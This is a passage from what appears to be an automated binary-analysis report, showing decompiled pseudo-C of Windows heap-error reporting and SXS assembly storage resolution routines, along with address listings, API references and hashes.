					} else {
						E6B1DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E6B1DB150("Parameter1: %p\n",  *0x6b2c58a4);
				}
				_t115 =  *0x6b2c58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E6B1DB150();
					} else {
						E6B1DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E6B1DB150("Parameter2: %p\n",  *0x6b2c58a8);
				}
				_t117 =  *0x6b2c58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E6B1DB150();
					} else {
						E6B1DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E6B1DB150("Parameter3: %p\n",  *0x6b2c58ac);
				}
				_t119 =  *0x6b2c58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E6B1DB150();
					} else {
						E6B1DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x6b2c58b4);
					E6B1DB150("Last known valid blocks: before - %p, after - %p\n",  *0x6b2c58b0);
				} else {
					_t120 =  *0x6b2c58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E6B1DB150();
				} else {
					E6B1DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E6B1DB150("Stack trace available at %p\n", 0x6b2c58c0);
			}











                                                                                                                            0x6b291c10
                                                                                                                            0x6b291c16
                                                                                                                            0x6b291c1e
                                                                                                                            0x6b291c3d
                                                                                                                            0x6b291c3e
                                                                                                                            0x6b291c20
                                                                                                                            0x6b291c35
                                                                                                                            0x6b291c3a
                                                                                                                            0x6b291c44
                                                                                                                            0x6b291c55
                                                                                                                            0x6b291c5a
                                                                                                                            0x6b291c65
                                                                                                                            0x6b291c67
                                                                                                                            0x00000000
                                                                                                                            0x6b291c6e
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b291c67
                                                                                                                            0x6b291cdc
                                                                                                                            0x6b291ce5
                                                                                                                            0x6b291d04
                                                                                                                            0x6b291d05
                                                                                                                            0x6b291ce7
                                                                                                                            0x6b291cfc
                                                                                                                            0x6b291d01
                                                                                                                            0x6b291d0b
                                                                                                                            0x6b291d17
                                                                                                                            0x6b291d1f
                                                                                                                            0x6b291d25
                                                                                                                            0x6b291d30
                                                                                                                            0x6b291d4f
                                                                                                                            0x6b291d50
                                                                                                                            0x6b291d32
                                                                                                                            0x6b291d47
                                                                                                                            0x6b291d4c
                                                                                                                            0x6b291d61
                                                                                                                            0x6b291d67
                                                                                                                            0x6b291d68
                                                                                                                            0x6b291d6e
                                                                                                                            0x6b291d79
                                                                                                                            0x6b291d98
                                                                                                                            0x6b291d99
                                                                                                                            0x6b291d7b
                                                                                                                            0x6b291d90
                                                                                                                            0x6b291d95
                                                                                                                            0x6b291daa
                                                                                                                            0x6b291db0
                                                                                                                            0x6b291db1
                                                                                                                            0x6b291db7
                                                                                                                            0x6b291dc2
                                                                                                                            0x6b291de1
                                                                                                                            0x6b291de2
                                                                                                                            0x6b291dc4
                                                                                                                            0x6b291dd9
                                                                                                                            0x6b291dde
                                                                                                                            0x6b291df3
                                                                                                                            0x6b291df9
                                                                                                                            0x6b291dfa
                                                                                                                            0x6b291e00
                                                                                                                            0x6b291e0a
                                                                                                                            0x6b291e13
                                                                                                                            0x6b291e32
                                                                                                                            0x6b291e33
                                                                                                                            0x6b291e15
                                                                                                                            0x6b291e2a
                                                                                                                            0x6b291e2f
                                                                                                                            0x6b291e39
                                                                                                                            0x6b291e4a
                                                                                                                            0x6b291e02
                                                                                                                            0x6b291e02
                                                                                                                            0x6b291e08
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b291e08
                                                                                                                            0x6b291e5b
                                                                                                                            0x6b291e7a
                                                                                                                            0x6b291e7b
                                                                                                                            0x6b291e5d
                                                                                                                            0x6b291e72
                                                                                                                            0x6b291e77
                                                                                                                            0x6b291e95

                                                                                                                            APIs
                                                                                                                            • DbgPrint.1105(HEAP[%wZ]: ,?,?,00000002,6B2C58C0,6B2920B1,?,6B28FFAF,00000001,00000020,6B2C58C0,00000000), ref: 6B291C35
                                                                                                                            • DbgPrint.1105(HEAP: ,?,00000002,6B2C58C0,6B2920B1,?,6B28FFAF,00000001,00000020,6B2C58C0,00000000), ref: 6B291C3E
                                                                                                                            • DbgPrint.1105(Heap error detected at %p (heap handle %p),?,00000002,6B2C58C0,6B2920B1,?,6B28FFAF,00000001,00000020,6B2C58C0,00000000), ref: 6B291C55
                                                                                                                            • DbgPrint.1105(HEAP[%wZ]: ,?,00000020,6B2C58C0,00000000), ref: 6B291CFC
                                                                                                                            • DbgPrint.1105(HEAP: ,00000020,6B2C58C0,00000000), ref: 6B291D05
                                                                                                                            • DbgPrint.1105(Error code: %d - %s,6B1B48A4,00000020,6B2C58C0,00000000), ref: 6B291D17
                                                                                                                            • DbgPrint.1105(HEAP[%wZ]: ,?,?,?,?,?,6B2C58C0,00000000), ref: 6B291D47
                                                                                                                            • DbgPrint.1105(HEAP: ,?,?,?,?,6B2C58C0,00000000), ref: 6B291D50
                                                                                                                            • DbgPrint.1105(Parameter1: %p,?,?,?,?,6B2C58C0,00000000), ref: 6B291D61
                                                                                                                            • DbgPrint.1105(HEAP[%wZ]: ,?,?,?,?,?,6B2C58C0,00000000), ref: 6B291D90
                                                                                                                            • DbgPrint.1105(HEAP: ,?,?,?,?,6B2C58C0,00000000), ref: 6B291D99
                                                                                                                            • DbgPrint.1105(Parameter2: %p,?,?,?,?,6B2C58C0,00000000), ref: 6B291DAA
                                                                                                                            • DbgPrint.1105(HEAP[%wZ]: ,?,?,?,?,?,6B2C58C0,00000000), ref: 6B291DD9
                                                                                                                            • DbgPrint.1105(HEAP: ,?,?,?,?,6B2C58C0,00000000), ref: 6B291DE2
                                                                                                                            • DbgPrint.1105(Parameter3: %p,?,?,?,?,6B2C58C0,00000000), ref: 6B291DF3
                                                                                                                            • DbgPrint.1105(HEAP[%wZ]: ,?,?,?,?,?,6B2C58C0,00000000), ref: 6B291E2A
                                                                                                                            • DbgPrint.1105(HEAP: ,?,?,?,?,6B2C58C0,00000000), ref: 6B291E33
                                                                                                                            • DbgPrint.1105(Last known valid blocks: before - %p, after - %p,?,?,?,?,6B2C58C0,00000000), ref: 6B291E4A
                                                                                                                            • DbgPrint.1105(HEAP[%wZ]: ,?,?,?,?,?,?,?,?,6B2C58C0,00000000), ref: 6B291E72
                                                                                                                            • DbgPrint.1105(Stack trace available at %p,6B2C58C0,?,?,?,?,?,?,?,6B2C58C0,00000000), ref: 6B291E8B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Print
                                                                                                                            • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                                                            • API String ID: 3558298466-2897834094
                                                                                                                            • Opcode ID: b217eec733a02f9c6901ceb35dd25f9dd1e44fb58584718800c1539ee35ace5a
                                                                                                                            • Instruction ID: 375ffd44f269c58ec1dd72c85d084bf71954fe3d192cad6530c4ea795e2d3baf
                                                                                                                            • Opcode Fuzzy Hash: b217eec733a02f9c6901ceb35dd25f9dd1e44fb58584718800c1539ee35ace5a
                                                                                                                            • Instruction Fuzzy Hash: CA619437071069FFDB01A75BE4CAE12B3E8EB15A62B098159F51D6B240C73CE9C1CA1B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B20C9BF, Relevance: 51.2, APIs: 18, Strings: 11, Instructions: 412memorynativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 77%
                                                                                                                            			E6B20C9BF(void* __ecx, signed int __edx, signed int _a4, intOrPtr _a12) {
				signed int _v12;
				char _v552;
				char _v1072;
				char _v1073;
				signed int _v1080;
				signed int _v1084;
				signed short _v1088;
				void* _v1092;
				signed short _v1094;
				char _v1096;
				char _v1100;
				intOrPtr _v1104;
				void* _v1108;
				char _v1112;
				char _v1116;
				signed short _v1120;
				char _v1124;
				char* _v1128;
				char _v1132;
				char _v1135;
				char _v1136;
				void* _v1140;
				char _v1144;
				intOrPtr _v1148;
				short _v1150;
				char _v1152;
				void* _v1156;
				char* _v1160;
				char _v1164;
				void* _v1168;
				void* _v1172;
				intOrPtr _v1176;
				void* _v1180;
				char _v1184;
				signed int _v1188;
				signed int _v1192;
				intOrPtr _v1196;
				char* _v1200;
				intOrPtr _v1204;
				char _v1208;
				char _v1216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t166;
				void* _t170;
				wchar_t* _t184;
				signed short _t188;
				char _t199;
				intOrPtr _t200;
				signed int _t205;
				signed int _t207;
				intOrPtr _t218;
				short _t219;
				char _t236;
				char _t242;
				signed int _t253;
				intOrPtr _t258;
				void* _t260;
				signed int _t264;
				void* _t272;
				void* _t276;
				unsigned int _t277;
				signed short _t279;
				signed int _t280;
				void* _t281;
				void* _t305;

				_t271 = __edx;
				_v12 =  *0x6b2cd360 ^ _t280;
				_t253 = _a4;
				_v1104 = _a12;
				_t272 = __ecx;
				_v1160 =  &_v1072;
				_v1168 = __ecx;
				_t166 = 0;
				_v1073 = 0;
				_v1084 = 0;
				_t274 = 0;
				_v1156 = 0;
				_v1164 = 0x2080000;
				_v1096 = 0;
				_v1092 = 0;
				_v1112 = 0;
				_v1108 = 0;
				_v1100 = 0;
				if(__ecx == 0) {
					L67:
					_push(_t166);
					_push(_t253);
					_push(_t271);
					_push(_t272);
					E6B265720(0x33, 0, "SXS: %s() bad parameters\nSXS:   Map                : %p\nSXS:   Data               : %p\nSXS:   AssemblyRosterIndex: 0x%lx\nSXS:   Map->AssemblyCount : 0x%lx\n", "RtlpResolveAssemblyStorageMapEntry");
					_t274 = 0xc000000d;
					L21:
					if(_v1073 == 0) {
						L23:
						if(_v1092 != 0) {
							E6B1DAD30(_v1092);
						}
						L24:
						if(_v1084 != 0) {
							_push(_v1084);
							E6B2195D0();
						}
						_t170 = _v1156;
						if(_t170 != 0) {
							RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t170);
						}
						L26:
						return E6B21B640(_t274, _t253, _v12 ^ _t280, _t271, _t272, _t274);
					}
					L22:
					_v1144 = _v1100;
					E6B20CCC0(4,  &_v1144, _v1104);
					goto L23;
				}
				if(__edx == 0 || _t253 < 1 || _t253 >  *((intOrPtr*)(__ecx + 4))) {
					_t166 =  *((intOrPtr*)(_t272 + 4));
					goto L67;
				} else {
					if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 8)) + _t253 * 4)) != 0) {
						goto L26;
					}
					asm("lfence");
					_t258 =  *((intOrPtr*)(__edx + 0x18));
					_t260 =  *((intOrPtr*)(_t258 + __edx + 0x10)) + __edx;
					_t276 =  *((intOrPtr*)(_t253 * 0x18 +  *((intOrPtr*)(_t258 + __edx + 0xc)) + __edx + 0x10)) + __edx;
					_t181 =  *((intOrPtr*)(_t276 + 0x50));
					if( *((intOrPtr*)(_t276 + 0x50)) > 0xfffe) {
						_push(__edx);
						E6B265720(0x33, 0, "SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p\n", _t181);
						_t274 = 0xc0000106;
						goto L23;
					}
					if(( *(_t276 + 4) & 0x00000010) != 0) {
						_v1080 =  &_v1164;
						_t272 =  *((intOrPtr*)(_t276 + 0x18)) + _t260;
						if(_t272 != 0) {
							_t184 = wcsrchr(_t272, 0x5c);
							if(_t184 != 0) {
								_t188 = 0x00000004 + (_t184 - _t272 >> 0x00000001) * 0x00000002 & 0x0000ffff;
								_v1088 = _t188;
								_t277 = _t188 & 0x0000ffff;
								if(_t188 <= 0x208) {
									_t264 = _v1080;
									L39:
									memcpy( *(_t264 + 4), _t272, _t277 - 2);
									_t281 = _t281 + 0xc;
									 *((short*)( *((intOrPtr*)(_v1080 + 4)) + (_t277 >> 1) * 2 - 2)) = 0;
									 *_v1080 = _v1088 + 0xfffffffe;
									L18:
									if(_v1084 == 0) {
										if(E6B1E6A00( *((intOrPtr*)(_v1080 + 4)),  &_v1112, 0,  &_v1184) != 0) {
											_v1156 = _v1108;
											_t199 = _v1184;
											if(_t199 == 0) {
												_t200 = 0;
											} else {
												_v1112 = _t199;
												_v1108 = _v1180;
												_t200 = _v1176;
											}
											_v1192 = _v1192 & 0x00000000;
											_v1188 = _v1188 & 0x00000000;
											_v1204 = _t200;
											_push(0x21);
											_v1200 =  &_v1112;
											_push(3);
											_push( &_v1216);
											_v1208 = 0x18;
											_push( &_v1208);
											_push(0x100020);
											_v1196 = 0x40;
											_push( &_v1084);
											_t205 = E6B219830();
											_t272 = _v1172;
											_t274 = _t205;
											if(_t272 != 0) {
												asm("lock xadd [edi], eax");
												if((_t205 | 0xffffffff) == 0) {
													_push( *((intOrPtr*)(_t272 + 4)));
													E6B2195D0();
													RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t272);
												}
											}
											if(_t274 >= 0) {
												goto L19;
											} else {
												_push(_t274);
												E6B265720(0x33, 0, "SXS: Unable to open assembly directory under storage root \"%S\"; Status = 0x%08lx\n",  *((intOrPtr*)(_v1080 + 4)));
												goto L21;
											}
										}
										E6B265720(0x33, 0, "SXS: Attempt to translate DOS path name \"%S\" to NT format failed\n",  *((intOrPtr*)(_v1080 + 4)));
										_t274 = 0xc000003a;
										goto L21;
									}
									L19:
									_t271 = _t253;
									_t207 = E6B20CE6C(_v1168, _t253, _v1080,  &_v1084);
									_t274 = _t207;
									if(_t207 < 0) {
										E6B265720(0x33, 0, "SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx\n", _t274);
									} else {
										_t274 = 0;
									}
									goto L21;
								}
								_v1094 = _t188;
								_t218 = E6B1F3A1C(_t277);
								_v1092 = _t218;
								if(_t218 != 0) {
									_t264 =  &_v1096;
									_v1080 = _t264;
									goto L39;
								}
								_t274 = 0xc0000017;
								goto L24;
							}
							_t274 = 0xc00000e5;
							goto L23;
						}
						_t274 = 0xc00000e5;
						goto L26;
					}
					_v1080 = _v1080 & 0x00000000;
					_t219 =  *((intOrPtr*)(_t276 + 0x50));
					_v1152 = _t219;
					_v1150 = _t219;
					_v1144 = __edx;
					_v1148 =  *((intOrPtr*)(_t276 + 0x54)) + _t260;
					_v1140 = _t253;
					_v1128 =  &_v552;
					_v1136 = 0;
					_v1132 = 0x2160000;
					_v1124 = 0;
					_v1116 = 0;
					_v1120 = 0;
					E6B20CCC0(1,  &_v1144, _v1104);
					if(_v1116 != 0) {
						_t274 = 0xc0000120;
						goto L23;
					}
					if(_v1124 != 0) {
						_t271 =  &_v1132;
						_t274 = E6B20CF6A( &_v1132,  &_v1152,  &_v1164,  &_v1096,  &_v1080,  &_v1084);
						if(_t274 >= 0) {
							_t271 = _t253;
							_t274 = E6B20CE6C(_t272, _t253,  &_v1132,  &_v1084);
							if(_t274 < 0) {
								_push(_t274);
								_push(_t253);
								_push("SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx\n");
								L44:
								_push(0);
								_push(0x33);
								E6B265720();
								goto L23;
							}
							_t274 = 0;
							goto L23;
						}
						_push(_t274);
						_push( &_v1132);
						_push("SXS: Attempt to probe known root of assembly storage (\"%wZ\") failed; Status = 0x%08lx\n");
						goto L44;
					}
					_t279 = _v1120;
					_t272 = 0;
					_t236 = _v1136;
					_v1100 = _t236;
					_v1088 = _t279;
					_v1073 = 1;
					if(_t279 == 0) {
						L16:
						_t305 = _t272 - _t279;
						L17:
						if(_t305 == 0) {
							L54:
							_push(_t272);
							E6B265720(0x33, 0, "SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries\n",  &_v1152);
							_t274 = 0xc0150004;
							goto L22;
						}
						goto L18;
					} else {
						goto L10;
					}
					while(1) {
						L10:
						_v1144 = _t236;
						_v1128 =  &_v552;
						_v1140 = _t272;
						_v1132 = 0x2160000;
						_v1136 = 0;
						E6B20CCC0(2,  &_v1144, _v1104);
						if(_v1136 != 0) {
							break;
						}
						_t242 = _v1132;
						if(_v1135 != 0) {
							if(_t242 == 0) {
								goto L54;
							}
							_t119 = _t272 + 1; // 0x1
							_t279 = _t119;
							_v1088 = _t279;
						}
						if(_t242 == 0) {
							L27:
							_t272 = _t272 + 1;
							if(_t272 >= _t279) {
								goto L17;
							} else {
								_t236 = _v1100;
								continue;
							}
						}
						if(_v1084 != 0) {
							_push(_v1084);
							E6B2195D0();
							_v1084 = _v1084 & 0x00000000;
						}
						_t271 =  &_v1132;
						_t274 = E6B20CF6A( &_v1132,  &_v1152,  &_v1164,  &_v1096,  &_v1080,  &_v1084);
						if(_t274 < 0) {
							if(_t274 != 0xc0150004) {
								_push(_t274);
								_push( &_v1152);
								E6B265720(0x33, 0, "SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx\n",  &_v1132);
								goto L22;
							}
							_t279 = _v1088;
							goto L27;
						} else {
							_t279 = _v1088;
							goto L16;
						}
					}
					_t274 = 0xc0000120;
					goto L22;
				}
			}






































































                                                                                                                            0x6b20c9bf
                                                                                                                            0x6b20c9d1
                                                                                                                            0x6b20c9d8
                                                                                                                            0x6b20c9dc
                                                                                                                            0x6b20c9e9
                                                                                                                            0x6b20c9eb
                                                                                                                            0x6b20c9f3
                                                                                                                            0x6b20c9f9
                                                                                                                            0x6b20c9fb
                                                                                                                            0x6b20ca01
                                                                                                                            0x6b20ca07
                                                                                                                            0x6b20ca09
                                                                                                                            0x6b20ca0f
                                                                                                                            0x6b20ca19
                                                                                                                            0x6b20ca1f
                                                                                                                            0x6b20ca25
                                                                                                                            0x6b20ca2b
                                                                                                                            0x6b20ca31
                                                                                                                            0x6b20ca39
                                                                                                                            0x6b24ac23
                                                                                                                            0x6b24ac23
                                                                                                                            0x6b24ac24
                                                                                                                            0x6b24ac25
                                                                                                                            0x6b24ac26
                                                                                                                            0x6b24ac34
                                                                                                                            0x6b24ac3c
                                                                                                                            0x6b20cc3c
                                                                                                                            0x6b20cc43
                                                                                                                            0x6b20cc65
                                                                                                                            0x6b20cc6c
                                                                                                                            0x6b24ac4c
                                                                                                                            0x6b24ac4c
                                                                                                                            0x6b20cc72
                                                                                                                            0x6b20cc79
                                                                                                                            0x6b24ac56
                                                                                                                            0x6b24ac5c
                                                                                                                            0x6b24ac5c
                                                                                                                            0x6b20cc7f
                                                                                                                            0x6b20cc87
                                                                                                                            0x6b24ac72
                                                                                                                            0x6b24ac72
                                                                                                                            0x6b20cc8d
                                                                                                                            0x6b20cc9f
                                                                                                                            0x6b20cc9f
                                                                                                                            0x6b20cc45
                                                                                                                            0x6b20cc51
                                                                                                                            0x6b20cc60
                                                                                                                            0x00000000
                                                                                                                            0x6b20cc60
                                                                                                                            0x6b20ca41
                                                                                                                            0x6b24ac20
                                                                                                                            0x00000000
                                                                                                                            0x6b20ca59
                                                                                                                            0x6b20ca5f
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b20ca65
                                                                                                                            0x6b20ca68
                                                                                                                            0x6b20ca76
                                                                                                                            0x6b20ca7c
                                                                                                                            0x6b20ca7e
                                                                                                                            0x6b20ca86
                                                                                                                            0x6b24a8ea
                                                                                                                            0x6b24a8f5
                                                                                                                            0x6b24a8fd
                                                                                                                            0x00000000
                                                                                                                            0x6b24a8fd
                                                                                                                            0x6b20ca90
                                                                                                                            0x6b24a90d
                                                                                                                            0x6b24a916
                                                                                                                            0x6b24a918
                                                                                                                            0x6b24a927
                                                                                                                            0x6b24a930
                                                                                                                            0x6b24a94c
                                                                                                                            0x6b24a94f
                                                                                                                            0x6b24a955
                                                                                                                            0x6b24a95b
                                                                                                                            0x6b24a98c
                                                                                                                            0x6b24a992
                                                                                                                            0x6b24a99a
                                                                                                                            0x6b24a9a9
                                                                                                                            0x6b24a9af
                                                                                                                            0x6b24a9c3
                                                                                                                            0x6b20cc09
                                                                                                                            0x6b20cc10
                                                                                                                            0x6b24ab03
                                                                                                                            0x6b24ab2f
                                                                                                                            0x6b24ab35
                                                                                                                            0x6b24ab3e
                                                                                                                            0x6b24ab5a
                                                                                                                            0x6b24ab40
                                                                                                                            0x6b24ab40
                                                                                                                            0x6b24ab4c
                                                                                                                            0x6b24ab52
                                                                                                                            0x6b24ab52
                                                                                                                            0x6b24ab5c
                                                                                                                            0x6b24ab63
                                                                                                                            0x6b24ab6a
                                                                                                                            0x6b24ab76
                                                                                                                            0x6b24ab78
                                                                                                                            0x6b24ab84
                                                                                                                            0x6b24ab86
                                                                                                                            0x6b24ab8d
                                                                                                                            0x6b24ab97
                                                                                                                            0x6b24ab98
                                                                                                                            0x6b24aba3
                                                                                                                            0x6b24abad
                                                                                                                            0x6b24abae
                                                                                                                            0x6b24abb3
                                                                                                                            0x6b24abb9
                                                                                                                            0x6b24abbd
                                                                                                                            0x6b24abc2
                                                                                                                            0x6b24abc6
                                                                                                                            0x6b24abc8
                                                                                                                            0x6b24abcb
                                                                                                                            0x6b24abdc
                                                                                                                            0x6b24abdc
                                                                                                                            0x6b24abc6
                                                                                                                            0x6b24abe3
                                                                                                                            0x00000000
                                                                                                                            0x6b24abe9
                                                                                                                            0x6b24abef
                                                                                                                            0x6b24abfc
                                                                                                                            0x00000000
                                                                                                                            0x6b24ac01
                                                                                                                            0x6b24abe3
                                                                                                                            0x6b24ab17
                                                                                                                            0x6b24ab1f
                                                                                                                            0x00000000
                                                                                                                            0x6b24ab1f
                                                                                                                            0x6b20cc16
                                                                                                                            0x6b20cc29
                                                                                                                            0x6b20cc2b
                                                                                                                            0x6b20cc30
                                                                                                                            0x6b20cc34
                                                                                                                            0x6b24ac13
                                                                                                                            0x6b20cc3a
                                                                                                                            0x6b20cc3a
                                                                                                                            0x6b20cc3a
                                                                                                                            0x00000000
                                                                                                                            0x6b20cc34
                                                                                                                            0x6b24a95e
                                                                                                                            0x6b24a965
                                                                                                                            0x6b24a96a
                                                                                                                            0x6b24a972
                                                                                                                            0x6b24a97e
                                                                                                                            0x6b24a984
                                                                                                                            0x00000000
                                                                                                                            0x6b24a984
                                                                                                                            0x6b24a974
                                                                                                                            0x00000000
                                                                                                                            0x6b24a974
                                                                                                                            0x6b24a932
                                                                                                                            0x00000000
                                                                                                                            0x6b24a932
                                                                                                                            0x6b24a91a
                                                                                                                            0x00000000
                                                                                                                            0x6b24a91a
                                                                                                                            0x6b20ca96
                                                                                                                            0x6b20ca9d
                                                                                                                            0x6b20caa7
                                                                                                                            0x6b20caae
                                                                                                                            0x6b20caba
                                                                                                                            0x6b20cac0
                                                                                                                            0x6b20cace
                                                                                                                            0x6b20cad4
                                                                                                                            0x6b20cae3
                                                                                                                            0x6b20cae9
                                                                                                                            0x6b20caf3
                                                                                                                            0x6b20caf9
                                                                                                                            0x6b20caff
                                                                                                                            0x6b20cb05
                                                                                                                            0x6b20cb11
                                                                                                                            0x6b24a9cb
                                                                                                                            0x00000000
                                                                                                                            0x6b24a9cb
                                                                                                                            0x6b20cb1e
                                                                                                                            0x6b24a9f8
                                                                                                                            0x6b24aa03
                                                                                                                            0x6b24aa07
                                                                                                                            0x6b24aa36
                                                                                                                            0x6b24aa47
                                                                                                                            0x6b24aa4b
                                                                                                                            0x6b24aa18
                                                                                                                            0x6b24aa19
                                                                                                                            0x6b24aa1a
                                                                                                                            0x6b24aa1f
                                                                                                                            0x6b24aa1f
                                                                                                                            0x6b24aa21
                                                                                                                            0x6b24aa23
                                                                                                                            0x00000000
                                                                                                                            0x6b24aa28
                                                                                                                            0x6b24aa4d
                                                                                                                            0x00000000
                                                                                                                            0x6b24aa4d
                                                                                                                            0x6b24aa09
                                                                                                                            0x6b24aa10
                                                                                                                            0x6b24aa11
                                                                                                                            0x00000000
                                                                                                                            0x6b24aa11
                                                                                                                            0x6b20cb24
                                                                                                                            0x6b20cb2a
                                                                                                                            0x6b20cb2c
                                                                                                                            0x6b20cb32
                                                                                                                            0x6b20cb38
                                                                                                                            0x6b20cb3e
                                                                                                                            0x6b20cb47
                                                                                                                            0x6b20cc01
                                                                                                                            0x6b20cc01
                                                                                                                            0x6b20cc03
                                                                                                                            0x6b20cc03
                                                                                                                            0x6b24aac0
                                                                                                                            0x6b24aac0
                                                                                                                            0x6b24aad1
                                                                                                                            0x6b24aad9
                                                                                                                            0x00000000
                                                                                                                            0x6b24aad9
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b20cb4d
                                                                                                                            0x6b20cb4d
                                                                                                                            0x6b20cb53
                                                                                                                            0x6b20cb5f
                                                                                                                            0x6b20cb6e
                                                                                                                            0x6b20cb74
                                                                                                                            0x6b20cb7e
                                                                                                                            0x6b20cb87
                                                                                                                            0x6b20cb93
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b20cba0
                                                                                                                            0x6b20cba7
                                                                                                                            0x6b24aa57
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b24aa59
                                                                                                                            0x6b24aa59
                                                                                                                            0x6b24aa5c
                                                                                                                            0x6b24aa5c
                                                                                                                            0x6b20cbb0
                                                                                                                            0x6b20cca2
                                                                                                                            0x6b20cca2
                                                                                                                            0x6b20cca5
                                                                                                                            0x00000000
                                                                                                                            0x6b20ccab
                                                                                                                            0x6b20ccab
                                                                                                                            0x00000000
                                                                                                                            0x6b20ccab
                                                                                                                            0x6b20cca5
                                                                                                                            0x6b20cbbd
                                                                                                                            0x6b24aa67
                                                                                                                            0x6b24aa6d
                                                                                                                            0x6b24aa72
                                                                                                                            0x6b24aa72
                                                                                                                            0x6b20cbe6
                                                                                                                            0x6b20cbf1
                                                                                                                            0x6b20cbf5
                                                                                                                            0x6b24aa84
                                                                                                                            0x6b24aa91
                                                                                                                            0x6b24aa98
                                                                                                                            0x6b24aaa9
                                                                                                                            0x00000000
                                                                                                                            0x6b24aaae
                                                                                                                            0x6b24aa86
                                                                                                                            0x00000000
                                                                                                                            0x6b20cbfb
                                                                                                                            0x6b20cbfb
                                                                                                                            0x00000000
                                                                                                                            0x6b20cbfb
                                                                                                                            0x6b20cbf5
                                                                                                                            0x6b24aab6
                                                                                                                            0x00000000
                                                                                                                            0x6b24aab6

                                                                                                                            APIs
                                                                                                                            • DbgPrintEx.1105(00000033,00000000,SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p,?,?,?,00000000,00000002), ref: 6B24A8F5
                                                                                                                              • Part of subcall function 6B20CCC0: memcpy.1105(6B1B4F84,?,6B1E6167,00000040,?,?), ref: 6B20CD56
                                                                                                                            • DbgPrintEx.1105(00000033,00000000,SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx,?,00000000,02160000,?,?,02080000,?,00000000,?,00000001,?,?,?), ref: 6B24AA23
